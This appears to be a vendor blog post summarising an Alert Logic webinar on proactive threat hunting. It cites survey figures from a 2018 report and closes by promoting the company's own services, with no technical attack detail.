Most organizations today understand that their networks, data and applications are under virtually constant siege from exploits and malware attacks. They’ve invested in the standard array of network and endpoint security tools designed to detect and block threats and protect them from these attacks. The problem with the traditional security strategy is that it is reactive. It’s time for organizations to take some initiative with threat hunting—and proactively seek out unknown attacks rather than just waiting to be breached.
Dr. Jonny Milliken, Threat Intelligence Manager for Alert Logic, and Holger Schulze, CEO of Cybersecurity Insiders, recently presented a threat hunting webinar on the value and importance of threat hunting. Threat hunting puts security on the offense. Rather than just waiting for an attack to trip an alarm, threat hunting takes a comprehensive, holistic approach to proactively monitor for and identify suspicious or potentially malicious activity, so you can take action earlier.
Traditional cyber security tools and methods are very effective for identifying and avoiding known threats. However, they are purely reactive. The attacker always gets the first move because the security tools can’t effectively defend against a threat until it has been discovered, reverse-engineered, and the required signatures developed to detect it.
Cybercriminals are also aware of the tools and techniques generally used to identify attacks, and they adapt and evolve new exploits and attacks that are designed to fly under the radar and remain undetected for as long as possible. Threat hunting turns the tables and enables you to actively seek out evidence and discover those attacks that slip past the defenses of traditional security tools.
Milliken and Schulze shared some interesting data about the current state of threat hunting from the 2018 Threat Hunting Report. The study found that more than 84 percent of those surveyed feel threat hunting should be a top security priority. More than half (55 percent) indicated that detecting advanced threats—hidden, unknown and emerging attacks—is a top challenge facing their security operations center (SOC). When asked why they have not invested in a dedicated threat hunting platform, 45 percent cited a lack of budget.
Milliken stresses that effective threat hunting requires a combination of the right tools, the right data, and the right security expertise. The right tools are of no use without good data and expert security insight. The right data won’t help you if you don’t have the tools to automate analysis and identify new or unique techniques. The right tool and the right data will get you part way, but you still need qualified information security professionals to verify and prioritize the results.
Of course, rather than investing in their own SOC or their own dedicated threat hunting platform, organizations can turn to Alert Logic. Milliken walked through an example of discovering an Oracle WebLogic remote code execution attack using threat hunting to demonstrate how Alert Logic experts go about investigating and identifying unknown attacks.